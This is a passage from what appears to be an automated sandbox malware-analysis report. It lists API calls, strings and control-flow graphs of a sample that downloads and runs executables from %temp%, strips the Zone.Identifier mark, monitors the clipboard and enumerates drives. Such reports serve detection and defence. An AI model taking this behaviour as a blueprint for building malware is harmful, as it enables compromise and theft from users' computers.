                                                                          • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EE5B
                                                                          • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EE8C
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EE9B
                                                                          • wsprintfW.USER32 ref: 0040EEB4
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040EEC4
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040EECF
                                                                          • Sleep.KERNEL32(000007D0), ref: 0040EEF0
                                                                          • ExitProcess.KERNEL32 ref: 0040EF18
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040EF2E
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EF3B
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040EF48
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040EF55
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040EF60
                                                                          • rand.MSVCRT ref: 0040EF75
                                                                          • Sleep.KERNEL32 ref: 0040EF8C
                                                                          • rand.MSVCRT ref: 0040EF92
                                                                          • rand.MSVCRT ref: 0040EFA6
                                                                          • wsprintfW.USER32 ref: 0040EFCD
                                                                          • DeleteUrlCacheEntryW.WININET(?), ref: 0040EFDD
                                                                          • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040EFF7
                                                                          • wsprintfW.USER32 ref: 0040F017
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040F027
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040F032
                                                                          • Sleep.KERNEL32(000007D0), ref: 0040F053
                                                                          • ExitProcess.KERNEL32 ref: 0040F07A
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040F089
                                                                          Strings
                                                                          • %s\%d%d.exe, xrefs: 0040EFC1
                                                                          • %s:Zone.Identifier, xrefs: 0040F00B
                                                                          • %s\%d%d.exe, xrefs: 0040EDA8
                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EDC5
                                                                          • %s:Zone.Identifier, xrefs: 0040EEA8
                                                                          • %temp%, xrefs: 0040ED4B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                          • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                          • API String ID: 3526668077-2417596247
                                                                          • Opcode ID: ddf9ac5ed83cf9badb19a381914167fc1d390300ce8058f702f4e9ba32742620
                                                                          • Instruction ID: ad06c6bce1eeec4b269cf6b178fa0be949fbab599c126aebf23d2838ae6487db
                                                                          • Opcode Fuzzy Hash: ddf9ac5ed83cf9badb19a381914167fc1d390300ce8058f702f4e9ba32742620
                                                                          • Instruction Fuzzy Hash: 8291EBB1940318ABE720DB61DC49FEA3379BB88701F0484B9F209A51C1DAB99AD4CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 469 40b0e0-40b0f7 call 40b010 472 40b0f9 469->472 473 40b0fe-40b11a call 40ac60 strcmp 469->473 474 40b385-40b388 472->474 477 40b121-40b13d call 40ac60 strstr 473->477 478 40b11c 473->478 481 40b180-40b19c call 40ac60 strstr 477->481 482 40b13f-40b15b call 40ac60 strstr 477->482 478->474 487 40b19e-40b1ba call 40ac60 strstr 481->487 488 40b1df-40b1fb call 40ac60 strstr 481->488 489 40b17b 482->489 490 40b15d-40b179 call 40ac60 strstr 482->490 497 40b1da 487->497 498 40b1bc-40b1d8 call 40ac60 strstr 487->498 499 40b1fd-40b219 call 40ac60 strstr 488->499 500 40b23e-40b254 EnterCriticalSection 488->500 489->474 490->481 490->489 497->474 498->488 498->497 511 40b239 499->511 512 40b21b-40b237 call 40ac60 strstr 499->512 501 40b25f-40b268 500->501 504 40b299-40b2a4 call 40b390 501->504 505 40b26a-40b27a 501->505 519 40b37a-40b37f LeaveCriticalSection 504->519 520 40b2aa-40b2b8 504->520 508 40b297 505->508 509 40b27c-40b295 call 40d6e0 505->509 508->501 509->504 511->474 512->500 512->511 519->474 521 40b2ba 520->521 522 40b2be-40b2cf call 409fd0 520->522 521->522 522->519 525 40b2d5-40b2f2 call 40d6e0 522->525 528 40b2f4-40b304 525->528 529 40b34a-40b362 525->529 530 40b310-40b348 call 40a3f0 528->530 531 40b306-40b30e Sleep 528->531 532 40b368-40b373 call 40b390 529->532 530->532 531->528 532->519 537 40b375 call 40adc0 532->537 537->519
                                                                          APIs
                                                                            • Part of subcall function 0040B010: gethostname.WS2_32(?,00000100), ref: 0040B02C
                                                                            • Part of subcall function 0040B010: gethostbyname.WS2_32(?), ref: 0040B03E
                                                                          • strcmp.NTDLL ref: 0040B110
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: gethostbynamegethostnamestrcmp
                                                                          • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                          • API String ID: 2906596889-2213908610
                                                                          • Opcode ID: 7f461de13bc063d15ec1264cc637e4dc2b0045e98767113049a7a1e9a29443f4
                                                                          • Instruction ID: 14285435020103c943bf7af990fcf7992b9b4842fd13eaff794dfd4de82f65c2
                                                                          • Opcode Fuzzy Hash: 7f461de13bc063d15ec1264cc637e4dc2b0045e98767113049a7a1e9a29443f4
                                                                          • Instruction Fuzzy Hash: 5061A3B5904304A7DB10EF65DC4AAAE3B74AB50348F14843AEC05773D2E73DEA54C69E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 539 401920-401947 GetTickCount WaitForSingleObject 540 401ac9-401acf 539->540 541 40194d-401964 WSAWaitForMultipleEvents 539->541 542 4019f0-401a03 GetTickCount 541->542 543 40196a-401981 WSAEnumNetworkEvents 541->543 544 401a43-401a4c GetTickCount 542->544 545 401a05-401a14 EnterCriticalSection 542->545 543->542 546 401983-401988 543->546 547 401ab5-401ac3 WaitForSingleObject 544->547 548 401a4e-401a5d EnterCriticalSection 544->548 549 401a16-401a1d 545->549 550 401a3a-401a41 LeaveCriticalSection 545->550 546->542 551 40198a-401990 546->551 547->540 547->541 552 401aa1-401ab1 LeaveCriticalSection GetTickCount 548->552 553 401a5f-401a77 InterlockedExchangeAdd call 40d6e0 548->553 554 401a35 call 401820 549->554 555 401a1f-401a27 549->555 550->547 551->542 556 401992-4019b1 accept 551->556 552->547 564 401a97-401a9f 553->564 565 401a79-401a82 553->565 554->550 555->549 558 401a29-401a30 LeaveCriticalSection 555->558 556->542 560 4019b3-4019c2 call 4022c0 556->560 558->547 560->542 566 4019c4-4019df call 401740 560->566 564->552 564->553 565->564 567 401a84-401a8d call 40ad80 565->567 566->542 572 4019e1-4019e7 566->572 567->564 572->542 573 4019e9-4019eb call 401cf0 572->573 573->542
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0040192C
                                                                          • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                          • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                          • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                          • accept.WS2_32(?,?,?), ref: 004019A8
                                                                          • GetTickCount.KERNEL32 ref: 004019F6
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                          • GetTickCount.KERNEL32 ref: 00401A43
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                          • GetTickCount.KERNEL32 ref: 00401AAB
                                                                          • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                          • String ID: PCOI$ilci
                                                                          • API String ID: 3345448188-3762367603
                                                                          • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                          • Instruction ID: 30acf59a4b92f93f505059f31b2171fe0b1c4ce4dbffa3032f64cc39e79a13a9
                                                                          • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                          • Instruction Fuzzy Hash: E241F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • memset.NTDLL ref: 0040E758
                                                                          • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E7A8
                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E7BB
                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F4
                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E82A
                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E855
                                                                          • HttpSendRequestA.WININET(00000000,00411DE8,000000FF,00009E34), ref: 0040E87F
                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E8BE
                                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 0040E910
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E941
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E94E
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E95B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                          • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                          • API String ID: 2761394606-2217117414
                                                                          • Opcode ID: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
                                                                          • Instruction ID: 85fc693ee375b13e16fb66d1006c55e21916babb9bf1ea115f780426e1cf3f13
                                                                          • Opcode Fuzzy Hash: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
                                                                          • Instruction Fuzzy Hash: C6513DB5A01228ABDB66CF54CC54BDA73BCAB48705F0481E9B60DA6280D7B86FC4CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 592 405910-405932 GetWindowLongW 593 405934-40593b 592->593 594 405956-40595d 592->594 595 405941-405945 593->595 596 4059c7-4059d8 IsClipboardFormatAvailable 593->596 597 405986-40598c 594->597 598 40595f 594->598 604 405964-405981 SetClipboardViewer SetWindowLongW 595->604 605 405947-40594b 595->605 602 4059e3-4059ed IsClipboardFormatAvailable 596->602 603 4059da-4059e1 596->603 600 4059a6-4059aa 597->600 601 40598e-4059a4 SetWindowLongW 597->601 599 405b44-405b5d DefWindowProcA 598->599 606 4059c2 600->606 607 4059ac-4059bc SendMessageA 600->607 601->606 609 4059f8-405a02 IsClipboardFormatAvailable 602->609 610 4059ef-4059f6 602->610 608 405a0b-405a0f 603->608 604->599 611 405951 605->611 612 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 605->612 606->599 607->606 614 405a15-405a1f OpenClipboard 608->614 615 405adf-405ae3 608->615 609->608 613 405a04 609->613 610->608 611->599 612->599 613->608 614->615 618 405a25-405a36 GetClipboardData 614->618 616 405ae5-405af5 SendMessageA 615->616 617 405afb 615->617 616->617 617->599 619 405a38 618->619 620 405a3d-405a4e GlobalLock 618->620 619->599 621 405a50 620->621 622 405a55-405a66 620->622 621->599 623 405a68-405a6c 622->623 624 405a89-405a9c call 405630 622->624 625 405a9e-405aae call 405750 623->625 626 405a6e-405a72 623->626 632 405ab1-405ac5 GlobalUnlock CloseClipboard 624->632 625->632 628 405a74 626->628 629 405a76-405a87 call 405510 626->629 628->632 629->632 632->615 635 405ac7-405adc call 4048a0 call 40a3f0 632->635 635->615
                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                          • SetClipboardViewer.USER32(?), ref: 00405968
                                                                          • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                          • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                          • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                          • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                          • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                          • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                          • String ID:
                                                                          • API String ID: 3549449529-0
                                                                          • Opcode ID: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
                                                                          • Instruction ID: e885106aa0884b4502b2237862738d0df8f48eeaae93079a212bc481fb1f7e33
                                                                          • Opcode Fuzzy Hash: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
                                                                          • Instruction Fuzzy Hash: E771FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                          • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                          • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                          • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                          • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                          • String ID: PCOI$ilci
                                                                          • API String ID: 2403999931-3762367603
                                                                          • Opcode ID: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
                                                                          • Instruction ID: 6a29a2099ab565f473fc8e7e311d0e2c8013c240518d5c358219ad3f6c04db59
                                                                          • Opcode Fuzzy Hash: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
                                                                          • Instruction Fuzzy Hash: C231A675900701ABC720DF70EC48B97B7A8BF08304F048A2AF559A3691D77AF894CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • memset.NTDLL ref: 00405838
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                          • Sleep.KERNEL32(00000001), ref: 00405864
                                                                          • GetTickCount.KERNEL32 ref: 0040586A
                                                                          • GetTickCount.KERNEL32 ref: 00405873
                                                                          • wsprintfW.USER32 ref: 00405886
                                                                          • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                          • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                          • TranslateMessage.USER32(?), ref: 004058E5
                                                                          • DispatchMessageA.USER32(?), ref: 004058EF
                                                                          • ExitThread.KERNEL32 ref: 00405901
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                          • String ID: %x%X$0
                                                                          • API String ID: 716646876-225668902
                                                                          • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                          • Instruction ID: b462c37bb5856212f40d891765093af4ebd6b4ddfa956f9ba6030597f9716a14
                                                                          • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                          • Instruction Fuzzy Hash: 3B212F71940308BBEB10ABA0DC49FEE7B78EB04711F148439F605BA1D0DBB955948F69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 688 40de00-40de9b memset InternetCrackUrlA InternetOpenA 689 40dea1-40ded4 InternetConnectA 688->689 690 40e017-40e020 688->690 691 40e00a-40e011 InternetCloseHandle 689->691 692 40deda-40df0a HttpOpenRequestA 689->692 691->690 693 40df10-40df27 HttpSendRequestA 692->693 694 40dffd-40e004 InternetCloseHandle 692->694 695 40dff0-40dff7 InternetCloseHandle 693->695 696 40df2d-40df31 693->696 694->691 695->694 697 40dfe6 696->697 698 40df37 696->698 697->695 699 40df41-40df48 698->699 700 40dfd9-40dfe4 699->700 701 40df4e-40df70 InternetReadFile 699->701 700->695 702 40df72-40df79 701->702 703 40df7b 701->703 702->703 704 40df7d-40dfd4 call 40a220 memcpy 702->704 703->700 704->699
                                                                          APIs
                                                                          • memset.NTDLL ref: 0040DE28
                                                                          • InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
                                                                          • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
                                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 0040DFBA
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040DFF7
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E004
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E011
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                          • String ID: <$GET
                                                                          • API String ID: 1205665004-427699995
                                                                          • Opcode ID: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
                                                                          • Instruction ID: 48cd83f5195f7f7898929b3619b8d091957442f788ca39022680675dc0c7e588
                                                                          • Opcode Fuzzy Hash: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
                                                                          • Instruction Fuzzy Hash: 51510D71941228ABDB36CB50CC55BD9B7BCAB44705F0480E9F60D6A2C1D7B96BC8CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • Sleep.KERNEL32(000003E8), ref: 00406B3E
                                                                          • GetModuleFileNameW.KERNEL32(00000000,00416C68,00000104), ref: 00406B50
                                                                            • Part of subcall function 0040E9B0: CreateFileW.KERNEL32(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
                                                                            • Part of subcall function 0040E9B0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
                                                                            • Part of subcall function 0040E9B0: CloseHandle.KERNEL32(000000FF), ref: 0040E9F2
                                                                          • ExitThread.KERNEL32 ref: 00406CBA
                                                                            • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                                            • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                            • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                            • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                          • Sleep.KERNEL32(000007D0), ref: 00406CAD
                                                                            • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                          • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406BEF
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C04
                                                                          • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C1F
                                                                          • wsprintfW.USER32 ref: 00406C32
                                                                          • wsprintfW.USER32 ref: 00406C52
                                                                          • wsprintfW.USER32 ref: 00406C75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                          • String ID: (%dGB)$%s%s$Unnamed volume
                                                                          • API String ID: 1650488544-2117135753
                                                                          • Opcode ID: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
                                                                          • Instruction ID: ad18969486da017d66fc0e664040911e0da7e4c37c3c5655858771b0e8e5c1cf
                                                                          • Opcode Fuzzy Hash: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
                                                                          • Instruction Fuzzy Hash: 6B41A9B1900318BBE714DB94DD55FEE7378EB48700F0081A5F20AB51D0EA785794CF6A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 728 40ea00-40ea3f CreateFileW 729 40ea45-40ea60 CreateFileMappingW 728->729 730 40eb5a-40eb5e 728->730 731 40eb50-40eb54 CloseHandle 729->731 732 40ea66-40ea7f MapViewOfFile 729->732 733 40eb60-40eb80 CreateFileW 730->733 734 40ebb4-40ebba 730->734 731->730 735 40ea85-40ea9b GetFileSize 732->735 736 40eb46-40eb4a CloseHandle 732->736 737 40eb82-40eba2 WriteFile CloseHandle 733->737 738 40eba8-40ebb1 call 40a3f0 733->738 739 40eaa1-40eab4 call 40ca30 735->739 740 40eb3c-40eb40 UnmapViewOfFile 735->740 736->731 737->738 738->734 739->740 745 40eaba-40eac9 739->745 740->736 745->740 746 40eacb-40eafa call 40c3d0 745->746 746->740 749 40eafc-40eb27 call 40a720 memcmp 746->749 749->740 752 40eb29-40eb35 call 40a3f0 749->752 752->740
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040EA32
                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EA53
                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040EA72
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EA8B
